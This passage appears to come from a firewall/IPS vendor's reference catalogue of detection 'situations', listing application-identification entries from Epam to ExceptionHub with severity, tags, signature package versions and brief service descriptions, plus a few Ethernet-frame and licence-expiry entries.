About this situation: Application Epam detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EPAM Systems, Inc.provide software product development by independent research agencies.
Back to top

Epic-Games

About this situation: Epic Games traffic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Description: Epic Games is an online video game company.
Back to top

Epic-Games-Infinity-Blade

About this situation: Epic Games Infinity Blade traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1638-5242
Description: Infinity Blade is a mobile adventure game.
Back to top

Epic-Games-Infinity-Blade-2

About this situation: Epic Games Infinity Blade 2 traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-534-5211
Last changed: sgpkg-ips-1638-5242
Description: Infinity Blade 2 is a mobile adventure game.
Back to top

Epic-IT

About this situation: Application Epic-IT detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Epic IT are a WA based ICT and Cloud Computing provider.
Back to top

Epicor-Financial-Management

About this situation: Application Epicor-Financial-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Epicor delivers business software solutions to manufacturing, distribution services industries.
Back to top

EpiqSystems

About this situation: Application EpiqSystems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EpiqSystems is a provider of integrated technology products and services for the legal profession. Its software applications and web-based platforms offer case management and document management solutions for electronic discovery, legal notification, claims administration, and controlled disbursement.
Back to top

ePlan-Services

About this situation: Application ePlan-Services detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ePlan Services is a provider of record-keeping and administration services to the U.S. defined contribution marketplace. By providing retirement plan solutions that have been specifically designed to serve the unique needs of small business, ePlan Services has been recognized for being among the most innovative retirement plan service providers in the country.
Back to top

eplus

About this situation: Application eplus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ePlus is a engineers transformative technology solutions for the most visionary organizations in the world. Through ePlus master architects, engineers, and consultants, ePlus see clients horizons and craft sustainable IT roadmaps to get them there.
Back to top

EPM-Live

About this situation: Application EPM-Live detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EPM Live provides Microsoft SharePoint-based Enterprise Project, Portfolio and Work Management Solutions to help your business improve productivity.
Back to top

ePost

About this situation: Application ePost detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Epost digital mailbox from Canada Post.
Back to top

ePropertySites.com

About this situation: Application ePropertySites.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AgentMarketing.com into the most comprehensive
Back to top

Equala

About this situation: EQuala usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A social radio app where you can play your friends music with the touch of a button.
Back to top

equens

About this situation: Application equens detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Equens is a payment processors, offers for future-proof payments and card processing solutions.
Back to top

Equifax

About this situation: Application Equifax detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Equifax helps to check your credit rating and get identity protection with daily monitoring and alerts.
Back to top

Equinix

About this situation: Application Equinix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Equinix provides carrier-neutral interconnection data center and global colocation services.
Back to top

EQWin-Data-Manager

About this situation: Application EQWin-Data-Manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EQWin Data Manager is used by environmental professionals to manage data primarily for the purposes of complex regulatory reporting.
Back to top

eReceptionist

About this situation: Application eReceptionist detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eReceptionist is the UK's call management solution for small and medium business.
Back to top

Erecruit

About this situation: Application Erecruit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: TempBuddy is a workforce management software that using smart mobile technology.
Back to top

eReviewz

About this situation: Application eReviewz detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Perfode offers a configurable, web-based solution for administering Employee Performance Evaluations Employee Performance Reviews.With eReviewz Business Edition you can manage employee performance appraisals, objectives and documentation.
Back to top

Ericom-AccessNow

About this situation: Application Ericom-AccessNow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ericom AccessNow allow access Windows Applications and Desktops from the comfort of any HTML5-compatible browser or device.
Back to top

Ericsson

About this situation: Application Ericsson detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ericsson is a multi-national corporation that provides communication technology and services. The company offers services, software and infrastructure in information and communications technology
Back to top

ERMSIM-Strategy-Analytics

About this situation: Application ERMSIM-Strategy-Analytics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ERMSIM - provider of algorithmic analytics applications to enable and support strategic and operations decisions.
Back to top

Eroom-Hosting

About this situation: eRoom Hosting usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: A a hosted collaborative solution that provides mid sized businesses with collaboration software in a hosted environment.
Back to top

Eroom-Net

About this situation: eRoom Net usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: A a hosted collaborative solution that provides mid sized businesses with world class collaboration software in a hosted environment.
Back to top

Erply

About this situation: Application Erply detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ERPLY is a software for commercial retail inventory and e-commerce that handles data across several sales locations, online stores and offices and provides real-time dashboards with relevant data.
Back to top

ERPNext

About this situation: Application ERPNext detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ERPNext is a web based, open source application that helps small and medium sized business manage their Accounting, Inventory, Sales, Purchase, Manufacturing, Projects, Customer Support and Website.
Back to top

erpWizard

About this situation: Application erpWizard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: erpWizard is a SaaS based integrated ERP software application in the cloud.
Back to top

Errorception

About this situation: Application Errorception detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Errorception is a error reporting service for client-side in-browser JavaScript errors. Client-side JavaScript errors occur in the end-users' browsers. Errorception solves this problem by trying to get as much detail as possible about such errors and reporting them back to the developer. It has a focus on run-time and load-time performance.
Back to top

Escrow.com

About this situation: Application Escrow.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Escrow.com reduces the potential risk of fraud by acting as a trusted third party that collects, holds and disburses funds according to Buyer and Seller instructions.
Back to top

Escuela-Campo-Alegre

About this situation: Application Escuela-Campo-Alegre detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Escuela Camp Alegre is an internet library.
Back to top

ESET-Remote-Administrator

About this situation: ESET Remote Administrator usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-939-5242
Description: ESET Remote Administrator (ERA) is a central management application for ESET products in a networkedenvironment.
Back to top

Esignal

About this situation: eSignal usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-870-5242
Description: eSignal provides streaming data of financial markets and allows users to examine the data using fundamental analysis and technical analysis. eSignal, a Windows-based application, uses JavaScript as the basis for the scripting language that programmers and traders can use for building custom indicators. Source: Wikipedia
Back to top

Esignit

About this situation: Application Esignit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ESIGNIT provides digital signature software solutions that provides customers, employees, vendors, and other partners the ability to fill out and sign documents online and enables contracts, non-disclosure agreements, employment applications, forms, and dozens of other business documents to be executed in a web browser.
Back to top

ESIGroup

About this situation: Application ESIGroup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ESIGroup is a provider in virtual prototyping that takes into account the physics of materials. It has developed an industry-oriented applications to realistically simulate a product's behavior during testing.
Back to top

ESL-ReadingSmart

About this situation: Application ESL-ReadingSmart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ESL ReadingSmart offers students individualized, content-based instruction to develop English language proficiency with emphasis on literacy and academic language development
Back to top

ESM-Software

About this situation: Application ESM-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ESM Software is the strategy execution software platform. It helps organizations understand and realize strategy.
Back to top

eSnips

About this situation: eSnips usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-628-5211
Description: eSnips is a web 2.0 interest-driven social sharing site that allows users to share content, promote and sell their creations and form social niche communities around their specific areas of interest.
Back to top

eSOL

About this situation: Application eSOL detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eSOL is a embedded software developer that enables customers to accelerate development of applications based on high-end single-core, multi-core, and many-core embedded processors. eSOL's advanced, scalable, multi-profiled real-time operating systems are tightly integrated with development tools and middleware components to create flexible development platforms used by OEMs and ODMs worldwide in competitive vertical markets such as automotive, consumer electronics, industrial and medical equipment, and aerospace.
Back to top

eSpatial

About this situation: Application eSpatial detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: eSpatial is a Mapping software to transform your business data into dynamic, interactive map visualizations that you can share online or print.
Back to top

Espion-Group

About this situation: Application Espion-Group detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Espion Group provides expertise to clients on Identification, Protection, Compliance and Management of their Information.
Back to top

ESPN

About this situation: ESPN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-543-5211
Last changed: sgpkg-ips-1714-5242
Description: ESPN is an American cable television network dedicated to broadcasting and producing sports-related programming 24 hours a day. This application situation is meant for blocking the ESPN content including streaming services and news sites.
Back to top

Esponce

About this situation: Application Esponce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Esponce is the premium mobile marketing platform, utilising QR Codes and much more. You can
Back to top

Esri-ArcGIS

About this situation: Esri ArcGIS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Orienteering, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1153-5242
Description: ArcGIS is a web-based map and location service provided by Esri.
Back to top

Esri-Customer-Care

About this situation: Application Esri-Customer-Care detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Esri is a supplier of Geographic Information System (GIS) software, web GIS and geodatabase management applications.
Back to top

Essential-Learning

About this situation: Application Essential-Learning detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Relias Learning offers online training to senior care, health and human services, corrections, and intellectual and developmental disabilities organizations. It
Back to top

EstiBot

About this situation: Application EstiBot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EstiBot is productivity and optimization tool for the domain name industry, including appraisals, domain portfolio management, domain name and keyword research, aftermarket and sales tools.
Back to top

eStreamDesk-Helpdesk

About this situation: Application eStreamDesk-Helpdesk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eStreamDesk is a hosted helpdesk and ticket tracking service that helps you to deliver exception customer service while saving time and cutting support costs.
Back to top

eSuite-platform

About this situation: Application eSuite-platform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eSuite platform is an integrated online store for the sale of physical, digital and
Back to top

eSurveysPro

About this situation: Application eSurveysPro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: eSurveysPro.com is an online survey software tool that can help you create free web surveys.
Back to top

Eteamz

About this situation: eteamz usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: eteamz helps to create a free website for sports team or league.
Back to top

Ethernet/IP

About this situation: Ethernet/IP traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1120-5242
Last changed: sgpkg-ips-1120-5242
Description: Ethernet/IP messaging protocol used in SCADA networks
Back to top

Ethernet_Frame-Discarded

About this situation: Ethernet frame discarded according to access rules
Context: A not allowed Ethernet frame was received
Severity: 1
Tags: Access
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The access rules specified that the received Ethernet frame was not allowed. The frame was received from an inline interface and was not forwarded or inspected further.
Back to top

Ethernet_Frame-Received

About this situation: Ethernet frame received
Context: An Ethernet frame was received
Severity: 1
Tags: Access
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The access rules specified that the received Ethernet frame was allowed. The frame will be processed according to further access rules.
Back to top

Ethernet_Too-Short-Frame

About this situation: Too short Ethernet frame
Context: Ethernet without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-112-2032
Last changed: sgpkg-ips-201-2032
Description: A malformed Ethernet frame was received. The length field value is too small to include the LLC or SNAP header, or raw IPX payload. The Ethernet frame is corrupted. These types of frames typically result from faulty network devices or from random errors in the network communications.
Back to top

EtherPad

About this situation: Application EtherPad detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Etherpad is a web-based collaborative real-time editor, allowing authors to simultaneously edit a text document, and see all of the participants edits in real-time, with the ability to display each author's text in their own color. There is also a chat box in the sidebar to allow meta communication.
Back to top

Ethn.io

About this situation: Application Ethn.io detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ethnio lets you create a screener that you can use on your site or on Craigslist, Twitter, Facebook, or anywhere else to automatically screen, call, and schedule participants for research.
Back to top

Etisalat-Cloud

About this situation: Application Etisalat-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Etisalat Cloud Compute is a set of modular cloud-based services and a telecommunications operator.
Back to top

Etouches

About this situation: Application Etouches detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Etouches provides in-cloud event management software. It covers function in the event planning lifecycle.
Back to top

ETran

About this situation: Application ETran detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FTNI's ETran solution helps customers streamline payment processing and minimize risk by consolidating Remote Deposit Capture, single and recurring ACH and credit/debit card transactions, on a single platform, in a managed services environment. FTNI specializes in reflecting these payments, real-time or batch, in the merchant's accounting system.
Back to top

Etsy

About this situation: Etsy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1769-5242
Description: Etsy is an e-commerce website focused on handmade or vintage items and supplies, as well as unique factory-manufactured items under Etsy's new guidelines, released in October 2013. These items cover a wide range, including art, photography, clothing, jewelry, food, bath and beauty products, quilts, knick-knacks, and toys. Many sellers also sell craft supplies such as beads, wire and jewelry-making tools. Source: Wikipedia
Back to top

Etuovi

About this situation: Etuovi usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-1764-5242
Description: Etuovi usage detected. Etuovi is a Finnish online search service for housing and apartments.
Back to top

Etv

About this situation: etv usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based video-streaming/IP-TV service where users can watch videos and/or live TV using just a web browser.
Back to top

Etz

About this situation: Application Etz detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Etz - cloud-based solution tailor-built for the recruitment sector with barcoded timesheets and full management dashboards.
Back to top

EucalyptusSystems

About this situation: Application EucalyptusSystems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EucalyptusSystems provides IT organizations in enterprises and technology businesses with the leading open source software for building AWS-compatible private clouds.
Back to top

EuroDNS

About this situation: Application EuroDNS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EuroDNS is an ICANN accredited domain registrar.
Back to top

EV.Cloud

About this situation: Application EV.Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Symantec is cloud based security and management services for small, medium and enterprise businesses
Back to top

Evaluation Period expired

About this situation: Evaluation Period expired
Context: Management Server situation
Severity: 8
Tags: SMC
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1296-5242
Description: The Evaluation Period has expired
Back to top

Evaluation Period expiring

About this situation: Evaluation Period expiring
Context: Management Server situation
Severity: 4
Tags: SMC
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1296-5242
Description: The Evaluation Period is expiring soon
Back to top

eVapt

About this situation: Application eVapt detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eVapt provides on-demand metering solution that meets the needs of SaaS providers to revenues and operational efficiency. Its solution integrates with SaaS offerings, thus enabling SaaS providers to focus on competency.
Back to top

eVariant

About this situation: Application eVariant detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Evariant healthcare CRM platform combines digital marketing solutions, big data, and analytics to grow patient engagement and enable proactive care.
Back to top

EVault-Storage-Service

About this situation: Application EVault-Storage-Service detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EVault LTS2 is service for manage and preserve your digital assets cost-effectively in the cloud for decades with immediate, anytime access.
Back to top

Eve-Online

About this situation: EVE Online usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a gaming service that allows users to play games or obtain information.
Back to top

Eventbrite

About this situation: Application Eventbrite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Eventbrite is a marketplace for live experiences that allows people to find and create events, platform allows event organizers to plan, promote, and sell tickets to events.
Back to top

EventMobi

About this situation: Application EventMobi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EventMobi allow create mobile event app for their meeting, conference, or trade show. Currently used by over 4000 event planners in 25 countries around the world,
Back to top

Eventzilla

About this situation: Eventzilla usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Eventzilla accepts online registrations and payments for events, training classes, conferences, seminars and fundraising events for free.
Back to top

Everbridge.com

About this situation: Application Everbridge.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Everbridge provider of SaaS-based unified critical communications solutions. Sends messages via telephone, text message and email, but stop once they know that a person has read a message.
Back to top

Evercontact

About this situation: Application Evercontact detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Evercontact is the cloud service that automatically updates address books by analyzing signature blocks in emails, or from contact details.
Back to top

Evergage

About this situation: evergage usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: A cloud-based service that makes it easy to personalize every customer experience with their business by collecting, analyzing, and responding to user behavior on their website and web applications in real-time. .
Back to top

Everlane

About this situation: Application Everlane detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Everlane is an online clothing retailer. They are known in the fashion industry for their stated commitment to radical transparency in sourcing and manufacturing and for their minimalist design.
Back to top

Evernote

About this situation: Evernote usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Evernote can store and edit the user's notes on their local machine. On unsupported systems, the Evernote service can be accessed online via a web interface, and user information stored on Evernote's server. A typical configuration involves both methods, with a downloaded application allowing data to be locally edited and stored, but periodically backed up and synchronised with a master copy stored on the server. This approach lets a user access and edit their data across multiple machines and operating system platforms, but still view, input and edit data when an Internet connection is not available. Source: Wikipedia
Back to top

Everquest

About this situation: EverQuest usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: EverQuest is a 3D fantasy-themed massively multiplayer online role-playing game. Source: Wikipedia
Back to top

Everyday-EDI

About this situation: Application Everyday-EDI detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Everyday EDI is a provider of EDI solutions for suppliers to the hardware, grocery, and retail chains.
Back to top

Evident.io

About this situation: Application Evident.io detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Evident.io is a provider of cloud infrastructure security for Amazon Web Services
Back to top

Evite

About this situation: Application Evite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Evite is online invitation and social event planning service. Helps hosts get parties started with hundreds of stylish invitation designs.
Back to top

eVoice

About this situation: Application eVoice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: my1voice is a cost-effective, feature-rich virtual phone service. With it, you'll have more professional - quality business telephone services - without the overhead of installing and maintaining special phone equipment. my1voice makes your phone work harder with features like Virtual Receptionist, unlimited extensions, voice mail and more, whether your employees are in the office, on the road or working remotely.
Back to top

EvolveIP

About this situation: Application EvolveIP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EvolveIP is the cloud services company, provides virtual servers, virtual desktops, IP phone systems and hosted call centers.
Back to top

evoPay

About this situation: Application evoPay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EVOPay is the software engine helping manage and control payment processes.
Back to top

Evzdrop

About this situation: evzdrop usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Evzdrop allows consumers and businesses to better understand the real time emotions and feedback about a place from people whose perspective and interpretation of the situation.
Back to top

eWay

About this situation: Application eWay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eWAY is an online payment gateway for process credit card payments. It is supported by more than 200 shopping cart platforms and 23 banks in the United Kingdom, Australia and New Zealand.
Back to top

Exact-Abacus

About this situation: Application Exact-Abacus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Exact Abacus is a multi channel eCommerce solution with stock control, warehouse management, supply chain and order processing modules.
Back to top

Exact-Online

About this situation: Application Exact-Online detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Exact Online is business software in the cloud designed for small manufacturers and wholesale distributors.
Back to top

ExactTarget

About this situation: Application ExactTarget detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ExactTarget is a cloud marketing platform. It's solutions enable marketers to integrate customer data from source to digital marketing campaigns.
Back to top

Examiner

About this situation: Application Examiner detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Examiner is a media company that operates a network of local news websites, allowing to share city-based knowledge on a blog-like platform.
Back to top

ExaVault

About this situation: ExaVault usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-630-5211
Description: ExaFault provides FTP space, storage and multi-user FTP file sharing.
Back to top

ExceptionHub

About this situation: Application ExceptionHub detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
